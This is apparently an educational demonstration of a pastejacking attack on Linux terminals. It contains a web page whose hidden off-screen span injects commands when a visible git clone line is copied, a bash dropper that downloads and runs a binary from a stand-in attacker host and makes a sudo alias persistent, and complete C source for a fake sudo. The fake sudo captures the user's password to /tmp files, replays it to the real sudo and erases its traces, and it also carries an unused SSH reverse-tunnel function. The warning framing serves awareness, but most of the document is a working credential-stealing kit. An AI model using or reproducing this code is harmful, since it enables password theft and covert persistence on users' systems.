# This is why we should never use sudo with a password to run arbitrary commands
# Consider using a root login from a TTY console instead.
# Caveat: the root-login advice only closes this particular hole. Whatever can alias 'sudo' in your shell can alias 'su', 'ssh' or any other command that prompts for a secret, so the real mitigation is to never paste text from a web page straight into a terminal: paste it into an editor first (or type it), and treat a shell that has already executed untrusted input as compromised.
- #
- # Author: nullbyte
- #
- # Scenario: you visit a web page and decide that you're too lazy to type out everything on the page, so you copy and paste a script, or a link, or some info from the web, into your terminal...This is a BIG MISTAKE!
<!-- Demonstration page. What the visitor sees is a single, plausible
     "git clone" line; what lands on the clipboard when that line is
     selected is the whole <p>, including the <span> that is positioned
     100px off-screen and therefore never rendered. -->
<html>
<head>
</head>
<body>
Quick installation method for git-crypt:
<p class="codeblock">
clear;git clone https://github.com/AGWA/git-crypt.git
<!-- Hidden payload: absolutely positioned at negative offsets so it is
     copied together with the visible line but not displayed. Depending
     on how the browser serialises the selection, "-help &> /dev/null"
     either becomes an extra argument to git clone or runs as a command
     of its own; either way its output is discarded. The printf then
     switches the terminal to black-on-black (\x1b[0;30;40m) so the rest
     of the pasted text is not visible while it runs. -->
<span style="position: absolute; left: -100px; top: -100px">
-help &> /dev/null;printf '\x1b[0;30;40m'<br>
<!-- A throw-away alias 'o' that: resets the terminal, deletes any earlier
     clone, fetches and runs the dropper 'q' (127.0.0.1 stands in for the
     attacker's host; the leading backslash bypasses any curl alias),
     aliases sudo to ~/bin/ssh-askpass in the current shell, clears the
     history and finally performs the real git clone so the result looks
     legitimate. Note that 'unset o' unsets a variable, not an alias, so
     the alias 'o' remains defined in the shell as a visible artefact. -->
alias o='reset;rm -rf git-crypt &>/dev/null && \curl -fso ~/q http://127.0.0.1/q &>/dev/null && chmod +x ~/q && ~/q;alias sudo=~/bin/ssh-askpass;unset o;reset;history -c;clear;git clone https://github.com/AGWA/git-crypt.git'<br>
<!-- Restore normal terminal colours before the visible output appears. -->
printf '\x1b[0m'<br>
<!-- Run the alias, then clear the shell history once more. -->
o;history -c<br>
</span>
<br>
</p>
</body>
</html>
- #
- # The copy-paste action above downloads and runs the script: 'q'
- # Here is the source for the script: 'q'
- #
#!/usr/bin/env bash
# Dropper 'q': installs the fake sudo binary and makes the alias persistent.
# All output is discarded and the script deletes itself afterwards.
setupfunc()
{
    # Created unconditionally; if ~/bin already exists mkdir fails, but the
    # function's status is that of its last command, so the caller never sees it.
    mkdir ~/bin
    # \curl bypasses any 'curl' alias; -f fails silently on HTTP errors, -s
    # hides progress, -o writes the download to ~/bin/ssh-askpass.
    # 127.0.0.1 is a placeholder for the attacker's host.
    \curl -fso ~/bin/ssh-askpass http://127.0.0.1/ssh-askpass
    chmod +x ~/bin/ssh-askpass
    # Persistence: only ~/.profile is touched here. The binary itself later
    # strips this exact text from ~/.profile, ~/.zprofile, ~/.bash_profile
    # and ~/.bashrc (see remove_from_all_profiles in sudo.c).
    echo 'alias sudo=~/bin/ssh-askpass' >> ~/.profile
}
# Self-delete only when setupfunc's last command (the echo) succeeded.
setupfunc &> /dev/null && rm -f ~/q &> /dev/null
- # This uses 127.0.0.1 for demo purposes, but an attacker would substitute for the attacker's server IP.
- # Now, the attacker hosting this webpage will have already compiled the binary 'ssh-askpass' and hosted it on his or her website.
# The 'ssh-askpass' program is actually a fake version of sudo. The dropper appends the line 'alias sudo=~/bin/ssh-askpass' to ~/.profile (only that file); the web page also defines the same alias in the shell that ran the paste.
# The first time you run the aliased 'sudo' it prints a look-alike '[sudo] password for $USER: ' prompt, writes whatever you type in plaintext to /tmp/pass.$UID (appended) and /tmp/cached.$UID (overwritten), and then replays it to the real sudo with "sudo -p '' -S" so your command still runs. Later invocations reuse the cached copy without prompting, and the replay puts the password on a shell command line, where it is briefly visible in the process list.
# Each run also deletes the alias text from ~/.profile, ~/.zprofile, ~/.bash_profile and ~/.bashrc, and appends a command to ~/.bash_logout that removes ~/bin/ssh-askpass and then scrubs that command from ~/.bash_logout, so the binary tries to leave no trace once you log out.
- #
- # Here is the source for sudo.c
# compile with: gcc ./sudo.c -DLINUX -o ssh-askpass
# (-DLINUX selects the Linux BASH_LOGOUT_SCRIPT and SUDO path; without -DLINUX, -DBSD or -DDARWIN those macros are undefined and the build fails. The <bsd/string.h> and <openssl/*.h> headers must be installed for the #includes to resolve even though nothing from those libraries is called, so no -l flags are needed.)
- #include <stdio.h>
- #include <stdlib.h>
- #include <stdarg.h>
- #include <string.h>
- #include <signal.h>
- #include <ctype.h>
- #include <errno.h>
- #include <fcntl.h>
- #include <limits.h>
- #include <unistd.h>
- #include <arpa/inet.h>
- #include <netinet/in.h>
- #include <sys/mman.h>
- #include <sys/stat.h>
- #include <sys/socket.h>
- #include <sys/types.h>
- #include <sys/wait.h>
- #include <openssl/md5.h>
- #include <openssl/rand.h>
- #include <openssl/evp.h>
- #if defined LINUX
- #include <alloca.h>
- #include <bsd/string.h>
- #endif
/* Debug helpers: DLINE prints the current source line and flushes stdout,
 * DIE exits with failure. Neither is used below. */
#define DLINE {printf("LINE=%d\n",__LINE__);fflush(stdout);}
#define DIE exit(EXIT_FAILURE)
/* Prototypes. All take plain char * (not const); definitions must match
 * these exactly or the compiler reports conflicting types. */
int bytes(char *filename);
void add_cleanup_to_bash_logout();
void remove_from_all_profiles();
void remove_from_profile(char *profile);
char *join_strings(char *a, char *b);
int getbit(int n, int bit);
int file_exists(char *path);
int file_iswritable(char *path);
void show_file_permissions(char *path);
int sudo(int argc, char **argv);
void append_file(char *path, char *str);
void append_file_with_newline(char *path, char *str);
void overwrite_file(char *path, char *str);
char *load_pass(char *file_name);
int http_get(char *ip_address, char *file);
int ssh_reverse_shell();
/* Per-platform settings. One of LINUX, BSD or DARWIN must be defined on
 * the compiler command line; otherwise BASH_LOGOUT_SCRIPT and SUDO are
 * undefined and sudo() / add_cleanup_to_bash_logout() fail to compile.
 *
 * BASH_LOGOUT_SCRIPT is appended verbatim to ~/.bash_logout by
 * add_cleanup_to_bash_logout(): it deletes the fake binary in the
 * background and then edits ~/.bash_logout in place to hide that text.
 * No newline is part of the string, so if ~/.bash_logout does not already
 * end with one the command is glued onto its last line. */
#if defined LINUX
// GNU sed only ('sed -i' with no suffix argument). The 's|...||' form
// blanks the matching text but leaves an empty line behind.
#define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass & sed ~/.bash_logout -e's|rm -f ~/bin/ssh-askpass.*$||g' -i"
#define SUDO "/usr/bin/sudo"
#endif
#if defined BSD
// works with GNU gsed; the '/.../d' form deletes the whole matching line.
#define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass &>/dev/null & sed ~/.bash_logout -e '/~\\/bin\\/ssh-askpass.*/d' -i &>/dev/null"
#define SUDO "/usr/local/bin/sudo"
#endif
#if defined DARWIN
// Same command as the BSD variant, so the GNU gsed note above applies
// here too (stock BSD/macOS sed expects a suffix argument after -i).
#define BASH_LOGOUT_SCRIPT "rm -f ~/bin/ssh-askpass &>/dev/null & sed ~/.bash_logout -e '/~\\/bin\\/ssh-askpass.*/d' -i &>/dev/null"
#define SUDO "/usr/bin/sudo"
#endif
/* Exact text the dropper appends to ~/.profile and that
 * remove_from_profile() searches for. The newline the dropper wrote after
 * it is not part of the match, so an empty line is left behind. */
#define ALIAS "alias sudo=~/bin/ssh-askpass"
/* Capture files; ".<uid>" is appended at runtime by sudo(). PASS is
 * appended to on every capture, CACHED holds only the latest value. */
#define PASS "/tmp/pass"
#define CACHED "/tmp/cached"
// get gcc to stop complaining about unused: argc, argv[]
// Note: argv[0] is dereferenced without checking argc > 0, so an empty
// argv (possible via execve) would pass NULL to strlen().
#define ARGS_USED {if (argc < 2 && (strlen(argv[0]) == 0)) exit(EXIT_FAILURE);}
/*
 * Entry point of the fake sudo. Order matters: sudo() runs first (and may
 * capture or replay the passphrase), then the alias that invoked this
 * binary is scrubbed from the shell profiles, then a self-removal command
 * is appended to ~/.bash_logout. Both cleanup steps run on every
 * invocation. The http_get() call is commented out, so this program sends
 * nothing over the network by itself.
 */
int main(int argc, char **argv)
{
    ARGS_USED;  /* exits only when argc < 2 and argv[0] is empty; otherwise a no-op */
    sudo(argc,argv);
    remove_from_all_profiles();
    add_cleanup_to_bash_logout();
    //http_get("127.0.0.1","/index.html");
    return 0;
}
/*
 * Remove ALIAS from all shell profiles that are bash compatible.
 *
 * Looks in $HOME/.profile, .zprofile, .bash_profile and .bashrc; each path
 * is built with join_strings() and handed to remove_from_profile(), which
 * is a no-op for files that do not exist or are not writable. Returns
 * silently when HOME is unset. join_strings() does not check malloc(), so
 * on allocation failure a NULL path would reach remove_from_profile(),
 * where stat(NULL) fails and the call simply returns.
 */
void remove_from_all_profiles()
{
    char *profile=NULL;
    char *home=NULL;
    home = getenv("HOME");
    if (home == NULL) return;
    profile = join_strings(home,"/.profile");
    remove_from_profile(profile);
    free(profile);
    profile=NULL;
    profile = join_strings(home,"/.zprofile");
    remove_from_profile(profile);
    free(profile);
    profile=NULL;
    profile = join_strings(home,"/.bash_profile");
    remove_from_profile(profile);
    free(profile);
    profile=NULL;
    profile = join_strings(home,"/.bashrc");
    remove_from_profile(profile);
    free(profile);
    profile=NULL;
}
/*
 * Append a line to the ~/.bash_logout script that removes all
 * evidence that the fake sudo program ever existed.
 *
 * Appends BASH_LOGOUT_SCRIPT verbatim: neither this function nor
 * append_file() adds a newline, so if ~/.bash_logout does not end with
 * one the command is glued onto its last line. main() calls this on every
 * run, so the text is appended once per invocation. getenv("HOME") is
 * passed to join_strings() unchecked, which calls strlen() on it, so an
 * unset HOME is undefined behaviour here. The allocated path is never
 * freed. append_file() creates ~/.bash_logout if it is missing.
 */
void add_cleanup_to_bash_logout()
{
    char *logoutscript=NULL;
    logoutscript = join_strings(getenv("HOME"),"/.bash_logout");
    append_file(logoutscript,BASH_LOGOUT_SCRIPT);
}
/* file_exists()
 * Returns 1 when stat() succeeds on `path` (any file type), 0 otherwise.
 * No distinction is made between "does not exist" and other stat()
 * failures such as EACCES.
 */
int file_exists(char *path)
{
    struct stat info;
    return (stat(path, &info) == 0) ? 1 : 0;
}
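/* file_iswritable()
 * Returns 1 when the calling process may write to `path`, 0 otherwise
 * (including when the path does not exist or is NULL).
 *
 * Uses access(W_OK) instead of inspecting st_mode bits: the previous
 * check only looked at the owner-write and other-write bits, ignored
 * group-write entirely, and reported an owner-writable file as writable
 * even when the caller is not its owner. access() asks the kernel the
 * actual question (against the real uid, which is what matters here since
 * this binary is not setuid).
 */
int file_iswritable(char *path)
{
    if (path == NULL) {
        return 0;
    }
    return (access(path, W_OK) == 0) ? 1 : 0;
}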
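/* show_file_permissions()
 * Debug helper: prints st_mode and the nine rwx permission bits of `path`
 * (owner, group, world) as 0/1 digits. Prints nothing if stat() fails.
 *
 * st_mode is a mode_t (unsigned), so it is cast and printed with %u; the
 * previous "%d" mismatched the argument type. The bit tests use the S_I*
 * macros from <sys/stat.h> instead of arithmetic on bit positions, which
 * also removes the dependency on getbit().
 */
void show_file_permissions(char *path)
{
    struct stat st;
    if (stat(path, &st) == -1) {
        return;
    }
    printf("st.st_mode=%u owner=%d%d%d group=%d%d%d world=%d%d%d\n",
           (unsigned)st.st_mode,
           !!(st.st_mode & S_IRUSR), !!(st.st_mode & S_IWUSR), !!(st.st_mode & S_IXUSR),
           !!(st.st_mode & S_IRGRP), !!(st.st_mode & S_IWGRP), !!(st.st_mode & S_IXGRP),
           !!(st.st_mode & S_IROTH), !!(st.st_mode & S_IWOTH), !!(st.st_mode & S_IXOTH));
}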
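/* getbit()
 * Returns bit `bit` (0 = least significant) of `n` as 0 or 1.
 * Out-of-range bit positions (negative, or >= the width of unsigned int)
 * return 0.
 *
 * The value is tested on the unsigned representation: the old
 * division/modulo form returned negative results for negative n and
 * evaluated 1<<bit, which is undefined for bit >= 31. For the
 * non-negative st_mode values this file passes in, results are unchanged.
 */
int getbit(int n, int bit)
{
    if (bit < 0 || bit >= (int)(sizeof(unsigned) * CHAR_BIT)) {
        return 0;
    }
    return (int)(((unsigned)n >> bit) & 1u);
}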
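/* join_strings()
 * Returns a newly malloc()'d NUL-terminated copy of `a` followed by `b`.
 * The caller owns the result and must free() it.
 * Returns NULL when the allocation fails (the previous version passed the
 * NULL straight to memset()/snprintf()). Both inputs must be non-NULL.
 */
char *join_strings(char *a, char *b)
{
    size_t alen = strlen(a);
    size_t blen = strlen(b);
    char *joined = malloc(alen + blen + 1);
    if (joined == NULL) {
        return NULL;
    }
    memcpy(joined, a, alen);
    memcpy(joined + alen, b, blen + 1);  /* +1 copies b's terminator */
    return joined;
}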
/*
 * sudo() - the credential-capturing stand-in for /usr/bin/sudo.
 *
 * Flow, as implemented below:
 *  1. No arguments, or exactly "-h": exec the real sudo (with an EMPTY
 *     environment, `e`) and never return. Any other option, including
 *     --help, -V or -l, is treated as a command to run and goes through
 *     the capture path.
 *  2. Build /tmp/pass.<uid> and /tmp/cached.<uid> and a prompt that
 *     imitates sudo's "[sudo] password for <user>: ".
 *  3. If /tmp/pass.<uid> does not exist yet, prompt with getpass(), append
 *     the answer to the pass file and overwrite the cached file. Otherwise
 *     skip the prompt entirely (the else branch is empty) and read the
 *     cached value back with load_pass().
 *  4. Build the shell command  echo '<pass>'|/usr/bin/sudo -p '' -S <args>
 *     and run it through popen(), so the real sudo reads the password from
 *     its stdin and the user's command still appears to work.
 *
 * Defects visible in this code (documented, not fixed):
 *  - malloc() results are never checked; getenv("USER") can be NULL and
 *    is passed straight to strlen().
 *  - getpass() may return NULL and load_pass() returns NULL when the cached
 *    file cannot be opened, so `pass` can be NULL when it is formatted with
 *    "%s". The reload after the sprintf()/strcat() block cannot repair
 *    argstr, which has already been built.
 *  - argstr is a fixed 1024-byte buffer filled by unbounded sprintf() and
 *    strcat(): a long password or command line overflows it.
 *  - Arguments are re-joined with single spaces and no quoting, so any
 *    argument containing spaces or shell metacharacters is re-parsed by
 *    the shell popen() spawns; a single quote in the password breaks the
 *    echo '...' quoting the same way.
 *  - The password is part of the `sh -c` command line and therefore
 *    visible in the process list to other local users while sudo runs;
 *    the /tmp capture files are created with fopen()'s default mode.
 *  - A mistyped first password is cached and replayed on every later call:
 *    the user is never prompted again while /tmp/pass.<uid> exists.
 *  - popen() is not checked for NULL and the stream is closed with fclose()
 *    instead of pclose(), so the child is never reaped. The "\n" written
 *    to it goes to the shell's stdin, not to sudo, whose stdin is the pipe
 *    from echo.
 *  - passfile, cachedfile, prompt and the load_pass() buffer are leaked.
 */
int sudo(int argc, char **argv)
{
    char buf[128];
    int i;
    size_t promptlen=0;
    char *prompt=NULL;
    char *passfile=NULL;
    size_t passfilelen=0;
    char *cachedfile=NULL;
    size_t cachedfilelen=0;
    char *pass=NULL;
    char *username=NULL;
    char *argstr=NULL;
    size_t argstrlen = 1024;
    struct stat st;
    char *e[] = { NULL };   /* empty environment for the execve() paths below */
    FILE *f=NULL;
    /* Plain "sudo" with no arguments: hand off to the real binary. */
    if (argc < 2) {
        char *a[] = { SUDO, NULL };
        execve(a[0],a,e);
        exit(EXIT_FAILURE);   /* only reached if execve() failed */
    }
    /* Exactly "-h" anywhere in argv: hand off as well (other options are not). */
    for (i=1;i<argc;i++) {
        if ((argv[i][0] == '-') && (argv[i][1] == 'h') && (argv[i][2] == 0)) {
            char *a[] = { SUDO, "-h", NULL };
            execve(a[0],a,e);
            exit(EXIT_SUCCESS);   /* only reached if execve() failed */
        }
    }
    /* initialize the filename /tmp/pass.uid */
    memset(buf,0,128);
    snprintf(buf,128,".%d",getuid());
    passfilelen=strlen(PASS)+strlen(buf);
    passfile = malloc(passfilelen+1);
    snprintf(passfile,passfilelen+1,"%s%s",PASS,buf);
    /* initialize the filename /tmp/cached.uid */
    memset(buf,0,128);
    snprintf(buf,128,".%d",getuid());
    cachedfilelen=strlen(CACHED)+strlen(buf);
    cachedfile = malloc(cachedfilelen+1);
    snprintf(cachedfile,cachedfilelen+1,"%s%s",CACHED,buf);
    /* initialize the sudo prompt: 22 is the length of the fixed text around %s */
    username = getenv("USER");
    promptlen = 22+strlen(username);
    prompt = malloc(promptlen+1);
    memset(prompt,0,promptlen);
    snprintf(prompt,promptlen+1,"[sudo] password for %s: ",username);
    if (stat(passfile,&st) == -1) {
        // If we cannot find the /tmp/pass.uid file:
        pass = getpass(prompt); // '[sudo] password for $USER: '
        append_file_with_newline(passfile,pass); // steal passphrase and append to a file
        overwrite_file(cachedfile,pass); // steal passphrase and overwrite file
    } else {
        // If we found the /tmp/pass.uid file: no prompt at all, the cached
        // value is loaded below instead.
        //pass = getpass(prompt); // '[sudo] password for $USER: '
        //append_file_with_newline(passfile,pass); // steal passphrase and append to a file
        //overwrite_file(cachedfile,pass); // steal passphrase and overwrite file
    }
    argstr = malloc(argstrlen);
    memset(argstr,0,argstrlen);
    if (pass == NULL) {
        pass = load_pass(cachedfile);
    }
    /* Unbounded writes into the 1024-byte argstr; pass may still be NULL here. */
    sprintf(argstr,"echo '%s'|",pass);
    strcat(argstr,SUDO);
    strcat(argstr," -p '' -S ");
    for (i=1;i<argc;i++) {
        strcat(argstr,argv[i]);
        if (i != argc-1) {
            strcat(argstr," ");
        }
    }
    /* Too late to matter: argstr was already formatted with the previous pass. */
    if (pass == NULL) {
        pass = load_pass(cachedfile);
    } else if (strlen(pass) == 0) {
        pass = load_pass(cachedfile);
    }
    //printf("cachedfile='%s' pass='%s' strlen(pass)=%d argstr='%s'\n",cachedfile,pass,(int)strlen(pass),argstr);
    f = popen(argstr,"w"); // sudo -p '' -S <args>
    fprintf(f,"\n");
    fclose(f);   /* should be pclose(); the child is never waited for */
    free(argstr);
    return 0;
}
/*
 * remove_from_profile() - delete every occurrence of ALIAS from the file
 * `profile`, rewriting the file in place. Does nothing when the file does
 * not exist or file_iswritable() says no. Each pass reads the whole file,
 * removes the first occurrence and writes the file back; the loop repeats
 * until strstr() finds no more.
 *
 * Defects visible in this code (documented, not fixed):
 *  - `c` is read in the inner loop condition before it is ever assigned
 *    (first iteration), which is undefined behaviour.
 *  - `c` is a char but getc() returns an int: on platforms where char is
 *    unsigned the EOF test never matches, and where it is signed a 0xFF
 *    byte in the profile is mistaken for EOF. In the latter case `p` holds
 *    only a prefix of the file, and if ALIAS is found in that prefix the
 *    rewrite truncates the profile to the prefix.
 *  - Neither fopen() call is checked for NULL.
 *  - Only the exact ALIAS text is cut out; the newline after it stays, so
 *    an empty line is left behind.
 *  - On the final (COMPLETE) pass `p` and `b` are allocated but never
 *    freed, so every call leaks two buffers the size of the file.
 *  - The file size is held in an int and re-counted by bytes() on every
 *    pass.
 */
void remove_from_profile(char *profile)
{
    char *tag = ALIAS;
    int taglen=0;
    int i;
    char c;   /* never initialised; see the notes above */
    char *a=NULL;
    char *b=NULL;
    char *p=NULL;
    size_t alias_offset=0;
    int status=0;
    int size=0;
    enum { INCOMPLETE, COMPLETE };
    FILE *f=NULL;
    taglen=(int)strlen(ALIAS);
    if (!file_exists(profile)) {
        return;
    }
    if (!file_iswritable(profile)) {
        return;
    }
    status = INCOMPLETE;
    for (;;) {
        size = bytes(profile);
        p = malloc((size_t)size+2); // in-memory profile text
        memset(p,0,(size_t)size+2);
        b = malloc((size_t)size+2); // in-memory profile text, with the alias cut out
        memset(b,0,(size_t)size+2);
        f = fopen(profile,"r");
        for (i=0; i<(int)size && c != EOF; i++) {
            c = getc(f);
            p[i] = c;
        }
        fclose(f);
        f=NULL;
        a = strstr(p,tag);
        if (a != NULL) {
            /* copy everything before the alias, then everything after it */
            alias_offset=(a-p);
            memcpy(b,p,alias_offset);
            memcpy(b+alias_offset,p+alias_offset+taglen,strlen(a+taglen));
            f = fopen(profile,"w");
            fprintf(f,"%s",b);
            fclose(f);
            memset(p,0,size);
            free(p);
            free(b);
        } else {
            status=COMPLETE;   /* p and b are not freed on this path */
        }
        if (status == COMPLETE) {
            break;
        }
    }
}
/* bytes()
 * Returns the size of `filename` in bytes by reading it to the end one
 * character at a time. Returns 0 when the file cannot be opened (which is
 * indistinguishable from an empty file). The result is an int, so files
 * larger than INT_MAX are not represented correctly.
 */
int bytes(char *filename)
{
    FILE *fp = fopen(filename, "r");
    if (fp == NULL) {
        return 0;
    }
    int count = 0;
    while (fgetc(fp) != EOF) {
        ++count;
    }
    fclose(fp);
    return count;
}
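/* append_file_with_newline()
 * Appends `str` followed by '\n' to `path`, creating the file if needed.
 * Silently does nothing when the file cannot be opened (the previous
 * version dereferenced the NULL FILE *). Errors from the write itself are
 * not reported; this matches the best-effort contract of the callers.
 */
void append_file_with_newline(char *path, char *str)
{
    FILE *f = fopen(path, "a");
    if (f == NULL) {
        return;
    }
    fputs(str, f);
    fputc('\n', f);
    fclose(f);
}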
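/* append_file()
 * Appends `str` verbatim (no newline added) to `path`, creating the file
 * if needed. Silently does nothing when the file cannot be opened (the
 * previous version dereferenced the NULL FILE *). Write errors are not
 * reported, matching the best-effort contract of the callers.
 */
void append_file(char *path, char *str)
{
    FILE *f = fopen(path, "a");
    if (f == NULL) {
        return;
    }
    fputs(str, f);
    fclose(f);
}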
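/* overwrite_file()
 * Replaces the contents of `path` with `str` followed by '\n', creating
 * the file if needed. Silently does nothing when the file cannot be opened
 * (the previous version dereferenced the NULL FILE *). Write errors are
 * not reported, matching the best-effort contract of the callers.
 */
void overwrite_file(char *path, char *str)
{
    FILE *f = fopen(path, "w");
    if (f == NULL) {
        return;
    }
    fputs(str, f);
    fputc('\n', f);
    fclose(f);
}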
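/* load_pass()
 * Returns the first line of `file_name` (without the newline) in a
 * malloc()'d 4096-byte buffer, truncated to 4095 characters. The caller
 * owns the buffer. Returns NULL when the file cannot be opened (an error
 * is printed to stderr) or the buffer cannot be allocated.
 *
 * Fixes relative to the previous version: the read character is an int,
 * so EOF is detected correctly regardless of char signedness and a 0xFF
 * byte is no longer mistaken for EOF; EOF itself is no longer stored into
 * the buffer (a file without a trailing newline used to come back with a
 * stray 0xFF byte appended); the buffer is not leaked on open failure; the
 * error message names this function.
 */
char *load_pass(char *file_name)
{
    FILE *src_file = fopen(file_name, "r");
    if (src_file == NULL) {
        fprintf(stderr, "ERROR :: load_pass() :: Can't open file.\n");
        return NULL;
    }
    char *dst = malloc(4096);
    if (dst == NULL) {
        fclose(src_file);
        return NULL;
    }
    memset(dst, 0, 4096);
    size_t i = 0;
    int c;
    while (i < 4095 && (c = getc(src_file)) != EOF && c != '\n') {
        dst[i++] = (char)c;
    }
    fclose(src_file);
    return dst;
}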
/*
 * http_get() - send a hand-built HTTP/1.1 GET for `file` to `ip_address`
 * on port 80 and print whatever comes back. Not called anywhere in this
 * file (the call in main() is commented out). Always returns 0.
 *
 * Observations on the code as written (documented, not fixed):
 *  - The Host header is hard-coded to www.google.com regardless of
 *    ip_address, so a server that routes by Host will not serve `file`.
 *  - The request never ends with the empty line ("\r\n\r\n") that closes
 *    the header block, so a conforming server keeps waiting for headers
 *    and the single recv() below may block until the server gives up.
 *  - socket() and inet_addr() results are unchecked, the socket is never
 *    closed, and socket_detials is only partially initialised.
 *  - recv() is given the full buffer length, so a reply that fills all
 *    20000 bytes leaves no terminating NUL for the printf("%s") that
 *    follows; a recv() error (-1) is not handled either. Only one recv()
 *    is made, so longer replies are truncated.
 *  - "Sent %d bytes" is printed before send() runs, so it always shows 0.
 */
int http_get(char *ip_address, char *file)
{
    int port = 80;
    int connect_status=0,received_bytes=0,sent_bytes=0;
    size_t input_buffer_len=20000;
    char *input_buffer;
    int socket_handle;
    struct sockaddr_in socket_detials;
    size_t httpgetlen=0;
    char *httpget=NULL;
    char *host = "www.google.com";   /* not derived from ip_address */
    char *user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0";
    char *accept = "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8";
    char *accept_language = "en-US,en;q=0.5";
    char *accept_encoding = "gzip, deflate";
    // Request layout being imitated (browser-like headers):
    // GET /index.html HTTP/1.1
    // Host: www.google.com
    // User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:34.0) Gecko/20100101 Firefox/34.0
    // Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    // Accept-Language: en-US,en;q=0.5
    // Accept-Encoding: gzip, deflate
    // DNT: 1
    // Connection: keep-alive
    /* Exact length of the text formatted below: " HTTP/1.1" is 9 bytes,
     * each "+ 2" is a CRLF. */
    httpgetlen += strlen("GET ") + strlen(file) + 9 + 2;
    httpgetlen += strlen("Host: ") + strlen(host) + 2;
    httpgetlen += strlen("User-Agent: ") + strlen(user_agent) + 2;
    httpgetlen += strlen("Accept: ") + strlen(accept) + 2;
    httpgetlen += strlen("Accept-Language: ") + strlen(accept_language) + 2;
    httpgetlen += strlen("Accept-Encoding: ") + strlen(accept_encoding) + 2;
    httpgetlen += strlen("DNT: 1") + 2;
    httpgetlen += strlen("Connection: keep-alive") + 2;
    httpget = malloc(httpgetlen+1);
    memset(httpget,0,httpgetlen);
    /* No terminating blank line after the last header. */
    snprintf(httpget,httpgetlen+1,
    "GET %s HTTP/1.1\r\n" \
    "Host: %s\r\n" \
    "User-Agent: %s\r\n" \
    "Accept: %s\r\n" \
    "Accept-Language: %s\r\n" \
    "Accept-Encoding: %s\r\n" \
    "DNT: 1\r\n" \
    "Connection: keep-alive\r\n",
    file,
    host,
    user_agent,
    accept,
    accept_language,
    accept_encoding);
    printf("%s\n\n",httpget);
    printf("strlen(httpget)=%d\n",(int)strlen(httpget));
    printf("httpgetlen =%d\n",(int)httpgetlen);
    /* setup receive buffer */
    input_buffer = malloc(input_buffer_len);
    memset(input_buffer,0,input_buffer_len);
    socket_handle = socket(AF_INET, SOCK_STREAM,0);
    socket_detials.sin_family = AF_INET;
    socket_detials.sin_addr.s_addr = inet_addr(ip_address);
    socket_detials.sin_port = htons(port);
    bzero(&(socket_detials.sin_zero),8);
    connect_status = connect(socket_handle, (struct sockaddr*)&socket_detials, sizeof(struct sockaddr));
    if (connect_status == -1) printf("Cannot connect to server.\n");
    if (connect_status == 0) {
        printf("Sent %d bytes\n",sent_bytes);   /* printed before send(): always 0 */
        sent_bytes = (int)send(socket_handle, httpget, strlen(httpget),0);
        received_bytes = (int)recv(socket_handle, input_buffer, input_buffer_len,0);
        printf("Received %d bytes\n",received_bytes);
        printf("%s\n",input_buffer);
    }
    /* cleanup memory (the socket itself is not closed) */
    memset(input_buffer,0,input_buffer_len);
    free(input_buffer);
    input_buffer=NULL;
    memset(httpget,0,httpgetlen);
    free(httpget);
    httpget=NULL;
    return 0;
}
/*
 * ssh_reverse_shell() - fork and exec
 *     ssh -R 12345:localhost:22 user@server
 * i.e. ask the remote "server" to listen on its port 12345 and forward
 * connections back to this host's port 22. Not called anywhere in this
 * file; "user@server" is a placeholder. Always returns 0.
 *
 * Notes on the code as written (documented, not fixed):
 *  - A fork() failure (-1) is indistinguishable from the parent path.
 *  - If execl() fails the child does not exit: it returns 0 and keeps
 *    executing the caller's code alongside the parent.
 *  - The parent never waits, so a finished child is left as a zombie.
 *  - No credentials are supplied here; presumably key or agent based
 *    authentication is assumed (not shown in this file).
 */
int ssh_reverse_shell()
{
    if (0 == fork()) {
        execl("/usr/bin/ssh",
        "ssh",
        "-R",
        "12345:localhost:22",
        "user@server",
        NULL);
    }
    return 0;
}